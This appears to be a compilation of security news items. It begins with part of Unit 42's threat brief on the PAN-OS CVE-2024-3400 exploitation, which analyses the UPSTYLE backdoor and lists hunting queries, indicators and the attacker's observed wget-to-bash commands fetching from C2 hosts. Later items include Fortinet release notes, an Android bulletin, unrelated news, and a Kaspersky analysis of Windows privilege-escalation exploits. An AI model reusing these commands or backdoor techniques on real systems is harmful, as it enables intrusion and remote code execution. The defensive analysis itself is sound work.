We were unable to access the commands executed via this URL. However, we believe this URL was used to deploy a second Python-based backdoor, which our colleagues at Volexity referred to as UPSTYLE. The UPSTYLE backdoor uploaded to the firewall was hosted at hxxp://144.172.79[.]92/update.py, but we saw a similar backdoor hosted at nhdata.s3-us-west-2.amazonaws[.]com. According to the HTTP headers, it appears the threat actor last modified it on April 7, 2024.

Accept-Ranges: bytes
Content-Length: 5187
Content-Type: application/octet-stream
Date: Thu, 11 Apr 2024 16:12:16 GMT
Etag: "6612443d-1443"
Last-Modified: Sun, 07 Apr 2024 06:59:09 GMT
Server: nginx/1.18.0 (Ubuntu)

The update.py file hosted at 144.172.79[.]92 has a SHA256 value of 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac. This file is a backdoor that has multiple layers. First, update.py writes another Python script to the following location:

[snip]/site-packages/system.pth

The Python script written to system.pth Base64 decodes an embedded Python script and executes it.
This embedded Python script has two functions named protect and check, which are called in that order. The protect function sends a SIGTERM signal and writes the contents of the system.pth file back to itself, likely as a persistence mechanism. The check function will read /proc/self/cmdline to see if it is running as monitor mp before running another Base64 embedded Python script, which is the functional backdoor.

The Python script run by system.pth has a function named __main that will run in a thread. This function first reads the contents of the following file, along with its access and modified times:

[snip]/css/bootstrap.min.css

It then enters an infinite loop that iterates once every two seconds, reading in the following file:

[snip]/sslvpn_ngx_error.log

The script will then iterate through each line of the file and search the line for the threat actor's command using the following regular expression:

img\[([a-zA-Z0-9+/=]+)\]

If the above regular expression matches, the script will Base64 encode the contents of the command and run it using the popen method within Python's OS module. The lines of the sslvpn_ngx_error.log file that do not match the regular expression are written back to the file, which essentially prunes the lines that contain commands from persisting in the sslvpn_ngx_error.log file for later analysis. After running the command, the script writes the output of the command to the following file:

[snip]/css/bootstrap.min.css

The script will then create another thread that runs a function called restore. The restore function takes the original content of the bootstrap.min.css file, as well as the original access and modified times, sleeps for 15 seconds and writes the original contents back to the file and sets the access and modified times to their originals. The point of this function is to avoid leaving the output of the commands available for analysis.
Also, this suggests that the threat actor has automation built into the client side of this backdoor, as they only have 15 seconds to grab the results before the backdoor overwrites the file.

Using the initial backdoor in the crontab, we have evidence of a handful of the commands the threat actor ran on the firewall. The commands include copying configuration files to the web application folder and exfiltrating them via HTTP requests to those files. The following IP address was seen attempting to access a specific configuration file copied to this folder, which we believe is a VPN used by the threat actor:

66.235.168[.]222

We also observed the threat actor running another command to receive commands from a slightly different URL as the cronjob backdoor:

wget -qO- hxxp://172.233.228[.]93/patch|bash

Lastly, the threat actor cleaned up after themselves by removing all files associated with the backdoors and clearing their cronjobs.

Interim Guidance

Please refer to the Palo Alto Networks security advisory on CVE-2024-3400 for the most current interim guidance for mitigating the vulnerability.

Unit 42 Managed Threat Hunting Queries

The Unit 42 Managed Threat Hunting team continues to track any attempts to exploit this CVE across our customers, using Cortex XDR and the XQL queries below. Cortex XDR customers can also use these XQL queries to search for signs of exploitation.
// Description: Search for domain IOC in raw NGFW logs
dataset = panw_ngfw_url_raw
| filter url_domain ~= ".*nhdata.s3-us-west-2.amazonaws.com"
| fields _time, log_source_name, action, app, url_domain, uri, url_category, source_ip, source_port, dest_ip, dest_port, protocol, rule_matched, rule_matched_uuid

// Description: Detect hits for the specific prevention signature for CVE-2024-3400
config case_sensitive = false
| dataset = panw_ngfw_threat_raw
| filter threat_id = "95187"
| fields _time, log_source_name, action, app_category, app_sub_category, threat_id, threat_name, source_ip, source_port, dest_ip, dest_port, *

// Description: Hits for known IOCs in NGFW traffic
config case_sensitive = false
| dataset = panw_ngfw_traffic_raw
| filter source_ip in ("66.235.168.222", "144.172.79.92", "172.233.228.93") or dest_ip in ("66.235.168.222", "144.172.79.92", "172.233.228.93")
| fields _time, log_source_name, action, action_source, app, bytes_sent, bytes_received, bytes_total, source_ip, source_port, dest_ip, dest_port, protocol, rule_matched, rule_matched_uuid, session_end_reason

// Description: Hits for known IOCs in XDR telemetry and NGFW telemetry (assuming proper integration of NGFW)
config case_sensitive = false
| dataset = xdr_data
| filter event_type = ENUM.STORY
| filter action_remote_ip in ("172.233.228.93", "66.235.168.222", "144.172.79.92") OR dns_query_name ~= ".nhdata.s3-us-west-2.amazonaws.com" OR action_external_hostname ~= ".nhdata.s3-us-west-2.amazonaws.com"
| fields _time, agent_hostname, actor_process_image_name, action_local_ip, action_remote_ip, action_remote_port, dns_query_name, action_external_hostname

Conclusion

The security advisory will continue to provide up to date information on impacts to Palo Alto Networks products and recommended mitigations. We will continue to update this threat brief with information on exploitation.
Again, Palo Alto Networks would like to thank Volexity for finding this issue and their continuing coordination and partnership. Please reference Volexity’s blog for their analysis. Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Protections and mitigations for the observed exploitation activity are below and will be updated as more become available.

Palo Alto Networks Product Protections for CVE-2024-3400

Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat. If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

North America Toll-Free: 866.486.4842 (866.4.UNIT42)
EMEA: +31.20.299.3130
APAC: +65.6983.8730
Japan: +81.50.1790.0200

Next-Generation Firewalls and Prisma Access With Advanced Threat Prevention

Next-Generation Firewall with the Advanced Threat Prevention security subscription can help block exploitation of CVE-2024-3400 via Threat Prevention signature: 95187.

Cortex XDR, XSIAM and the Unified Cloud Agent

Cortex XDR and XSIAM agents and analytics help protect and detect against post-exploitation activity if an attacker tries to enumerate or laterally move to other assets.

Cortex Xpanse and XSIAM ASM Module

Cortex Xpanse has the ability to identify exposed Palo Alto Networks GlobalProtect devices on the public internet and escalate these findings to defenders. Customers can enable alerting on this risk by ensuring that the Palo Alto Networks GlobalProtect Attack Surface Rule is enabled. Identified findings can either be viewed in the Threat Response Center or in the incident view of Expander.
These findings are also available for Cortex XSIAM customers who have purchased the ASM module.

Indicators of Compromise

UPSTYLE Backdoor (Update.py)
3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078

Command and Control Infrastructure
172.233.228[.]93
hxxp://172.233.228[.]93/policy
hxxp://172.233.228[.]93/patch
66.235.168[.]222

Hosted Python Backdoor
144.172.79[.]92
nhdata.s3-us-west-2.amazonaws[.]com

Observed Commands
wget -qO- hxxp://172.233.228[.]93/patch|bash
wget -qO- hxxp://172.233.228[.]93/policy | bash

Additional Resources
CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Gateway – Palo Alto Networks
Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400) – Volexity
Palo Alto Networks Releases Guidance for Vulnerability in PAN-OS, CVE-2024-3400 – Cybersecurity and Infrastructure Security Agency (CISA)

Updated April 12, 2024, at 10:15 a.m. PT to add Cortex XDR and XSIAM product protections, as well as Additional Resources.
Updated April 12, 2024, at 12:45 a.m. PT to add Cortex Xpanse product protections.

UPDATE: Unfortunately, Palo Alto Networks updated their advisory today to warn that previously shared mitigations have been found to be ineffective at protecting devices from the vulnerability. "Earlier versions of this advisory, disabling device telemetry was listed as a secondary mitigation action. Disabling device telemetry is no longer an effective mitigation," reads an update to Palo Alto's advisory. "Device telemetry does not need to be enabled for PAN-OS firewalls to be exposed to attacks related to this vulnerability." Therefore, the best solution is to install the latest PAN-OS software update to fix the vulnerability. Additionally, if you have an active 'Threat Prevention' subscription, you can block ongoing attacks by activating 'Threat ID 95187' threat prevention-based mitigation.
https://unit42.paloaltonetworks.com/cve-2024-3400/
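The brief above describes two things a defender can check for offline: the img[<base64>] marker the UPSTYLE backdoor looks for in sslvpn_ngx_error.log, and the published C2 addresses and S3 hostname. The following is an added hunting example written for this page (it is not Unit 42's, Volexity's or Palo Alto Networks' code). It scans exported error-log lines for the documented regular expression, decodes each captured payload for analyst review only, and matches traffic or DNS log lines against the listed indicators. Every log line in the block is a constructed sample, not a real capture.

```python
"""Offline hunting helpers for the UPSTYLE command channel described in the brief.

Added example written for this page; not Unit 42's, Volexity's or Palo Alto
Networks' code. Two checks:

1. scan_error_log(): find lines in sslvpn_ngx_error.log that carry the
   img[<base64>] command marker the brief documents and decode the payload
   for analyst review only (nothing is executed).
2. match_iocs(): flag traffic or DNS log lines that reference the published
   C2 IP addresses or the S3 hostname.

The sample log lines at the bottom are constructed for the demonstration.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple

# The regular expression quoted in the brief; group 1 is the Base64 payload.
CMD_PATTERN = re.compile(r"img\[([a-zA-Z0-9+/=]+)\]")

# Indicators listed in the brief, rebuilt from their defanged form for matching.
IOC_IPS = {"172.233.228.93", "66.235.168.222", "144.172.79.92"}
IOC_DOMAIN = "nhdata.s3-us-west-2.amazonaws.com"

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def decode_payload(encoded: str) -> Optional[str]:
    """Strictly decode a captured Base64 payload; None if it is not valid Base64."""
    try:
        return base64.b64decode(encoded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def scan_error_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return every line carrying the command marker, with its decoded payload.

    The backdoor rewrites the log without the matching lines after reading
    them, so an empty result only means no command survived in this copy; it
    is not proof that the channel was never used.
    """
    hits: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        for match in CMD_PATTERN.finditer(line):
            encoded = match.group(1)
            hits.append({"line_no": number, "encoded": encoded,
                         "decoded": decode_payload(encoded)})
    return hits


def match_iocs(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, indicator) pairs for lines that reference a known IOC."""
    findings: List[Tuple[int, str]] = []
    for number, line in enumerate(lines, start=1):
        for ip in IPV4.findall(line):
            if ip in IOC_IPS:
                findings.append((number, ip))
        if IOC_DOMAIN in line.lower():
            findings.append((number, IOC_DOMAIN))
    return findings


# Constructed sample data (not real captures). "dW5hbWUgLWE=" is Base64 for
# the harmless string "uname -a"; "abc" is deliberately malformed Base64.
SAMPLE_ERROR_LOG = [
    '2024/04/11 16:12:16 [error] 1234#0: *1 open() "/ssl-vpn/img[dW5hbWUgLWE=]" failed',
    '2024/04/11 16:12:18 [error] 1234#0: *2 client closed connection while reading',
    '2024/04/11 16:12:20 [error] 1234#0: *3 open() "/ssl-vpn/img[abc]" failed',
]
SAMPLE_TRAFFIC_LOG = [
    "2024-04-11T16:13:01Z src=10.0.0.5 dst=172.233.228.93 dport=80 app=web-browsing action=allow",
    "2024-04-11T16:13:02Z src=10.0.0.5 dst=198.51.100.7 dport=443 app=ssl action=allow",
    "2024-04-11T16:13:03Z dns_query=NHDATA.s3-us-west-2.amazonaws.com src=10.0.0.5",
]

if __name__ == "__main__":
    for hit in scan_error_log(SAMPLE_ERROR_LOG):
        print(f"line {hit['line_no']}: marker {hit['encoded']!r} -> {hit['decoded']!r}")
    for number, indicator in match_iocs(SAMPLE_TRAFFIC_LOG):
        print(f"line {number}: IOC {indicator}")
```

Because the backdoor prunes matching lines from sslvpn_ngx_error.log and restores bootstrap.min.css within 15 seconds, run scan_error_log against forwarded logs, backups or a forensic image rather than only the live file; the IOC matcher is equally useful on any exported traffic or DNS log, not just PAN-OS datasets.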
  7. We are pleased to inform you that Fortinet has released the latest update for FortiOS 7.0, version 7.0.15. This update brings a range of enhancements, optimizations, and security updates to further strengthen your network infrastructure's resilience and performance. Key highlights of the FortiOS 7.0.15 update include:

Resolved issues 7.0.15

The following issues have been fixed in version 7.0.15. To inquire about a particular bug, please contact Customer Service & Support.

Application Control
952307: FG-400F sees increased packet loss when using an application list in the policy.

FortiGate 6000 and 7000 platforms
949175: During FIM failover from FIM2 to FIM1, the NP7 PLE sticks on a cache invalidation, stopping traffic.

HA
869557: Upgrading or re-uploading an image to the HA secondary node causes the OS to be un-certified.
1011674: Upgrading from 7.0.14 GA to 7.2.8 GA from an HA secondary node fails with BIOS security level 2. The new image is unrecognized as un-certified and aborts the upgrade process. The HA cluster is unaffected.

Hyperscale
936747: Connections per second (CPS) performance of SIP sessions accepted by hyperscale firewall policies with EIM and EIF disabled that include overload with port block allocation (PBA) GCN IP pools is lower than expected.
949188: ICMP reply packets are dropped by FortiOS in a NAT64 hyperscale policy.
961684: When DoS policies are used and the system is under stress conditions, BGP might go down.
976972: New primary can get stuck on failover with HTTP CC sessions.

Intrusion Prevention
968367: IPS engine high memory usage can cause FortiOS to go into conserve mode.

Limitations
961992: The buffer and description queue limitation of Marvell switch ports causes a performance limitation.

Routing
935370: SD-WAN performance SLA tcp-connect probes clash with user sessions.
Security Fabric
887967: Fabric crashes when synchronizing objects with names longer than 64 characters.
988526: Address object changes from the CLI of the root FortiGate in Security Fabric are not synchronized with downstream devices.

SSL VPN
821240: SSLVPNVD 11 signal failure due to attempt to read out of bounds memory.

System
828557: FortiGate as DHCP relay is not showing a DHCP decline in the debugs when there is an IP conflict in the network.
888941: Some sessions are still reported as offloaded when auto-asic-offload is disabled.
910829: Degraded traffic bandwidth for download passing from 10G to 1G interfaces.
937500, 969083: FortiOS does not accept an installation script from FortiManager when creating an extender-profile with login-password-change is set to yes.
938449: In the 4.19 kernel, when a neighbor's MAC is changed, the session and IPsec tunnel cannot be flushed from the NPU.
943090: Buffer and description queue limitation of Marvell switch port will cause a performance limitation.
949481: The tx_collision_err counter in the FortiOS CLI keeps increasing on both 10G SFP+ X1 and X2 interfaces.
956107: On the FortiGate 400F and 600F, the buffer and description queue limitation of the Marvell switch port causes a performance limitation.
984696: Network usage is not accurately reported by the get system performance status command.
986698: The NP7 should use the updated MAC address from the ARP table to forward traffic to the destination server.
1001938: Support Kazakhstan time zone change to a single time zone, UTC+5.

User & Authentication
1000108: Guest-management administrators cannot see or print guest user passwords in plain text; the password is masked as ENC XXXX string.

WiFi Controller
821320: FG-1800F drops wireless client traffic in L2 tunneled VLAN with capwap-offload enabled.
We strongly recommend applying this update to your Fortinet devices to benefit from the latest features, security enhancements, and performance optimizations. Keeping your systems up to date is crucial in maintaining a secure and efficient network environment. For more information about the update process, release notes, and support resources, please visit the Fortinet Support Portal or reach out to Fortinet dedicated support team for assistance.
  8. Google Issues Security Warning for Pixel Devices: Critical Vulnerabilities Detected Google has issued a security advisory to Pixel users, alerting them to two high severity vulnerabilities that may be under limited, targeted exploitation. These vulnerabilities, identified as CVE-2024-29745 and CVE-2024-29748, pose significant risks and require immediate attention. The first vulnerability, CVE-2024-29745, is classified as an information disclosure vulnerability in the bootloader component. Bootloaders play a crucial role in the boot process of devices, ensuring that essential operating system data is loaded into memory during startup. Exploitation of this vulnerability could lead to unauthorized access to sensitive information stored on the device. The second vulnerability, CVE-2024-29748, is an elevation of privilege (EoP) vulnerability found in the Pixel firmware. Firmware serves as device-specific software that provides fundamental machine instructions necessary for hardware functionality and interaction with other software components. If exploited, this vulnerability could allow attackers to escalate their privileges on the device, potentially gaining control over critical system functions. To address these security risks, Google has released a security patch with a designated level of 2024-04-05 for Pixel devices. It is imperative for Pixel users to apply this security patch promptly to protect their devices from potential exploitation and mitigate the associated risks. Google emphasizes the importance of keeping devices up to date with the latest security patches and software updates to ensure optimal security posture and protect against emerging threats. Users are encouraged to enable automatic updates and regularly check for security patches to stay protected from vulnerabilities and cyber threats. 
In conclusion, the detection and prompt mitigation of these high severity vulnerabilities underscore Google's commitment to prioritizing user security and addressing potential security risks proactively. Pixel users are urged to take immediate action by applying the latest security patch to safeguard their devices and mitigate the risks associated with these vulnerabilities. ------------------ Android Security Bulletin—April 2024 Published April 1, 2024 The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2024-04-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version. Android partners are notified of all issues at least a month before publication. Source code patches for these issues will be released to the Android Open Source Project (AOSP) repository in the next 48 hours. We will revise this bulletin with the AOSP links when they are available. The most severe of these issues is a high security vulnerability in the System component that could lead to local escalation of privilege with no additional execution privileges needed. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed. Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform. Android and Google service mitigations This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android. 
Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible. The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

2024-04-01 security patch level vulnerability details

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2024-04-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

Framework

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.

CVE | References | Type | Severity | Updated AOSP versions
CVE-2024-23710 | A-311374917 | EoP | High | 13, 14
CVE-2024-23713 | A-305926929 | EoP | High | 12, 12L, 13, 14
CVE-2024-0022 | A-298635078 | ID | High | 13, 14
CVE-2024-23712 | A-304983146 | DoS | High | 12, 12L, 13, 14

System

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.
CVE | References | Type | Severity | Updated AOSP versions
CVE-2024-23704 | A-299931761 | EoP | High | 13, 14
CVE-2023-21267 | A-218495634 [2] [3] | ID | High | 12, 12L, 13, 14
CVE-2024-0026 | A-308414141 | DoS | High | 12, 12L, 13, 14
CVE-2024-0027 | A-307948424 | DoS | High | 12, 12L, 13, 14

Google Play system updates

There are no security issues addressed in Google Play system updates (Project Mainline) this month.

2024-04-05 security patch level vulnerability details

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2024-04-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

MediaTek components

These vulnerabilities affect MediaTek components and further details are available directly from MediaTek. The severity assessment of these issues is provided directly by MediaTek.

CVE | References | Severity | Subcomponent
CVE-2024-20039 | A-323462011 M-MOLY01240012 * | High | Modem Protocol
CVE-2024-20040 | A-323465955 M-ALPS08360153 * | High | wlan firmware
CVE-2023-32890 | A-323469023 M-MOLY01183647 * | High | Modem EMM

Widevine

This vulnerability affects Widevine components and further details are available directly from Widevine. The severity assessment of this issue is provided directly by Widevine.

CVE | References | Severity | Subcomponent
CVE-2024-0042 | A-312543200 * | High | Widevine DRM

Qualcomm components

These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.
CVE | References | Severity | Subcomponent
CVE-2024-21468 | A-318393412 QC-CR#3614610 [2] | High | Kernel
CVE-2024-21472 | A-318393741 QC-CR#3626401 | High | Kernel

Qualcomm closed-source components

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

CVE | References | Severity | Subcomponent
CVE-2023-28582 | A-299147008 * | Critical | Closed-source component
CVE-2023-28547 | A-303101227 * | High | Closed-source component
CVE-2023-33023 | A-303101376 * | High | Closed-source component
CVE-2023-33084 | A-299146258 * | High | Closed-source component
CVE-2023-33086 | A-299146962 * | High | Closed-source component
CVE-2023-33095 | A-299146595 * | High | Closed-source component
CVE-2023-33096 | A-299146025 * | High | Closed-source component
CVE-2023-33099 | A-303101372 * | High | Closed-source component
CVE-2023-33100 | A-303101224 * | High | Closed-source component
CVE-2023-33101 | A-303101066 * | High | Closed-source component
CVE-2023-33103 | A-299146257 * | High | Closed-source component
CVE-2023-33104 | A-299146882 * | High | Closed-source component
CVE-2023-33115 | A-303101567 * | High | Closed-source component
CVE-2024-21463 | A-318393254 * | High | Closed-source component

Common questions and answers

This section answers common questions that may occur after reading this bulletin.

1. How do I determine if my device is updated to address these issues?

To learn how to check a device's security patch level, see Check and update your Android version. Security patch levels of 2024-04-01 or later address all issues associated with the 2024-04-01 security patch level. Security patch levels of 2024-04-05 or later address all issues associated with the 2024-04-05 security patch level and all previous patch levels.
Device manufacturers that include these updates should set the patch string level to:

[ro.build.version.security_patch]:[2024-04-01]
[ro.build.version.security_patch]:[2024-04-05]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2024-04-01 security patch level. Please see this article for more details on how to install security updates.

2. Why does this bulletin have two security patch levels?

This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level. Devices that use the 2024-04-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins. Devices that use the security patch level of 2024-04-05 or newer must include all applicable patches in this (and previous) security bulletins. Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

3. What do the entries in the Type column mean?

Entries in the Type column of the vulnerability details table reference the classification of the security vulnerability.

Abbreviation | Definition
RCE | Remote code execution
EoP | Elevation of privilege
ID | Information disclosure
DoS | Denial of service
N/A | Classification not available

4. What do the entries in the References column mean?

Entries under the References column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

Prefix | Reference
A- | Android bug ID
QC- | Qualcomm reference number
M- | MediaTek reference number
N- | NVIDIA reference number
B- | Broadcom reference number
U- | UNISOC reference number

5. What does an * next to the Android bug ID in the References column mean?
Issues that are not publicly available have an * next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site. 6. Why are security vulnerabilities split between this bulletin and device/partner security bulletins, such as the Pixel bulletin? Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device/partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.
  9. WhatsApp, the popular messaging platform used by billions worldwide, experienced a major outage today at 9:00 pm, causing users to be unable to send or receive messages. The outage affected users across various regions.

Image source: https://downdetector.com/status/whatsapp/

Service seems to be back to normal.
  10. Sega's recent announcement of extensive layoffs has sent shockwaves through the gaming industry, impacting key studios such as Sega Europe, Creative Assembly, and Hardlight. The news came in an email from Sega Europe boss Jurgen Post, detailing the layoffs affecting approximately 240 roles across these studios. Notably, the email also mentioned the sale of Relic Entertainment, responsible for iconic titles like Company of Heroes and Dawn of War. While specific numbers for each studio were not disclosed, Sega did confirm that Sports Interactive and Two Point Studios, also under the Sega Europe umbrella, were not affected. Despite the layoffs, Creative Assembly's upcoming projects, including new entries in the Total War series and an unannounced project, are still in active development. The sale of Relic Entertainment marks a significant transition as the studio moves towards becoming independently operated. Sega expressed its support for this shift, indicating a positive outlook for Relic's future endeavors. Relic itself affirmed its newfound independence, mentioning an external investor aiding in this transition. Notably, work on Company of Heroes 3 and ongoing support for their existing games will continue unabated. This announcement underscores the volatile nature of the gaming industry, where companies must navigate evolving market dynamics while striving to maintain creativity and innovation. As Sega and its associated studios navigate these changes, the gaming community eagerly anticipates the future projects and developments that will emerge from this transformative period.

Relic has posted this with the news announcement:

I think after Relic failed with Company of Heroes 3 and ruined the series with this failure, SEGA might have lost more than it invested and realized it is not worth keeping Relic with their failing game CoH3. From a gaming giant in the old-school gaming market to a company that is laying off staff and developers.
  11. Google Settles Lawsuit, Agrees to Delete Billions of Data Records from Chrome's Incognito Mode In a significant development regarding online privacy, Google has reached a settlement in a class-action lawsuit that accused the tech giant of collecting data from users' Chrome browsers while in Incognito mode without proper disclosure. This settlement marks a crucial step in addressing concerns about user privacy and data collection practices in one of the most widely used web browsers globally. The lawsuit, filed in June 2020, alleged that Google collected billions of data records from 136 million Chrome users in the United States while they were browsing in Incognito mode. This mode is designed to offer users a private browsing experience by not storing their browsing history or cookies. However, the lawsuit argued that Google's practices violated users' privacy expectations and failed to provide adequate transparency about data collection activities. As part of the settlement, Google has agreed to delete the data records collected from Chrome users in Incognito mode. This move is significant as it demonstrates Google's acknowledgment of the concerns raised by users and regulatory bodies regarding data privacy. By taking this action, Google aims to address the allegations of undisclosed data collection and improve transparency in its browser's privacy features. The case highlights broader issues surrounding online privacy and the challenges users face in maintaining control over their personal data while using digital services. Incognito mode, although intended to offer a level of privacy, has faced scrutiny for not providing complete anonymity or protection against tracking by websites and third-party entities. In response to the settlement, Google has reaffirmed its commitment to user privacy and stated that it will continue to enhance privacy features in Chrome to provide users with more control over their data. 
This includes improving transparency about data collection practices, implementing stricter privacy controls, and empowering users to make informed decisions about their online privacy settings. The resolution of this lawsuit serves as a reminder of the importance of transparency, accountability, and user empowerment in the digital age. It highlights the ongoing efforts by both technology companies and regulators to address privacy concerns and create a more privacy-conscious digital ecosystem that respects users' rights to data protection and control.
  12. 14 Mar 2024. Authors: Elsayed Elrefaei, Ashraf Refaat (Kaspersky GERT)

On August 8, 2023, Microsoft finally released a kernel patch for a class of vulnerabilities affecting Microsoft Windows since 2015. The vulnerabilities lead to elevation of privilege (EoP), which allows an account with user rights to gain SYSTEM privileges on a vulnerable host. The root cause of this attack surface, according to a 2015 blog, is the ability of a normal user account to replace the original C:\ drive with a fake one by placing a symlink for the system drives in the device map for each login session. This fake drive will be followed by the kernel during impersonation instead of the original system drive.

More than five months after the patches for these vulnerabilities were released, we’re still seeing some of their exploits in the wild because it’s a very easy way to get a quick NT AUTHORITY\SYSTEM, and that’s why it may be favored by well-known threat actors. We discussed these findings at the BlackHat MEA conference in November 2023, and in December 2023 and January 2024 we found two exploits that could still use this attack surface in unpatched versions of Windows. Both exploits are packed with UPX. After analyzing the first one, we saw that it was a packed version of a Google Project Zero PoC sample. The other sample was a packed version of an SSD Secure Disclosure public PoC, even using the same NamedPipe “\\\\.\\Pipe\\TyphoonPWN” without modifications. The PDB paths for both samples are:
C:\Users\Administrator\source\repos\exp\x64\Release\exp.pdb
C:\VVS-Rro\CVEs\spool\BitsPoc\src\x64\Release\PoC_BITs.pdb

Below we will highlight the key points and then focus on how to check if any of the vulnerabilities have been exploited or if there have been any attempts to exploit them, and enumerate popular CVEs included in this vulnerable surface.

Affected processes and services include native Windows services that run by default on most versions of the operating system. These include:
CSRSS
Windows Error Reporting (WER)
File History Service
Background Intelligent Transfer Service (BITS)
Print Spooler
Figure: Vulnerable Windows processes and services

The exploits affecting this attack surface share a common logic or pattern, including:
Searching for a DLL that runs with system integrity.
The DLL has an isolation-aware manifest file.
The ability to change the C:\ root to a writable directory via symlinks.

CSRSS | CVE-2022-22047
This Activation Context Cache Poisoning vulnerability leads to local privilege escalation. It’s one of the CVEs that was actively exploited by a threat actor called KNOTWEED | Denim Tsunami. Reversing the in-the-wild exploit for CVE-2022-22047 shows:
The exploit crafts a call into CSRSS.
The call requests an activation context for a privileged executable and specifies a malicious manifest.
The manifest uses an undocumented manifest XML attribute named loadFrom. This attribute allows unrestricted redirection of DLLs to any location on a disk, including locations outside of the normal search path, without even having to change the C:\ root drive.
Here is a detailed blog post by ZDI explaining CSRSS Cache Poisoning.

CSRSS | CVE-2022-37989
The second vulnerability, involving CSRSS Cache Poisoning, was a workaround for the first, CVE-2022-22047. After patching the undocumented “LoadFrom” attribute, there was another attribute that could be abused to load a manifest file from a user-controlled path by declaring a dependent assembly using path traversal in the name attribute. The patch for CVE-2022-37989 was simple: check if the name attribute of the dependency contains any forward or backward slashes, and set a flag to stop caching this suspicious manifest if name path traversal is detected. This CVE was discovered by ZDI.

Print Spooler | CVE-2022-29104
Print Spooler is a service that runs by default in almost all versions of Windows. It’s responsible for managing paper print jobs sent from a computer to a printer or print server. Reversing in-the-wild exploits of the CVE-2022-29104 Print Spooler vulnerability shows that it’s a .NET sample that creates a symbolic link from C:\ to the fake root C:\Imprint. The sample was uploaded to VirusTotal.
Fake C:\ drive structure:
C:\Imprint\Windows\system32
C:\Imprint\Windows\WinSxS
All folders inside the Imprint folder are writable, allowing an attacker to control their contents. Path traversal is added to “AssemblyIdentity” to point to the Imprint writable path. The vulnerability analysis shows that:
An attacker can remap the root drive (C:\) for privileged processes during impersonation.
During impersonation, all file accesses are performed using the DOS device map of the impersonated process.
CSRSS uses a user-modified side-by-side manifest for generating the activation context instead of the manifest in the WinSxS folder C:\Windows\WinSxS.
The WinSxS folder stores multiple copies of system files and components. It provides a central location for storing different versions of system files that are shared by multiple applications and processes, and it provides system stability and compatibility by allowing different applications to use the specific versions of files they need. WinSxS avoids DLL hell, a problem that occurs when different applications require different versions of the same DLL. The Windows operating system uses the application manifest to determine which version is appropriate for which app. The application manifest is stored in XML format and describes:
The dependencies associated with the application.
What permissions the application requires.
What compatibility settings the application supports.
CSRSS mitigation was enabled for spoolsv.exe and printfilterpipelinesvc.exe to stop impersonation while loading external resources, and then to resume impersonation after the external resources are loaded.

Print Spooler | CVE-2022-41073
After CVE-2022-29104 was patched, another vulnerability affecting Print Spooler was discovered – CVE-2022-41073. Reversing the in-the-wild exploit of this vulnerability shows some XML manipulation using path traversal to a writable path containing a modified version of prntvpt.dll that is loaded by Print Spooler. According to Project Zero, mitigation was added to CSRSS: the patch simply stopped any impersonation prior to the LoadLibraryExW call in winspool!LoadNewCopy, and then resumed it after the LoadLibraryExW call returned:
+ if (RevertToProcess(&TokenHandle, x) >= 0) {
lib = LoadLibraryExW(arg1, 0, dwFlags);
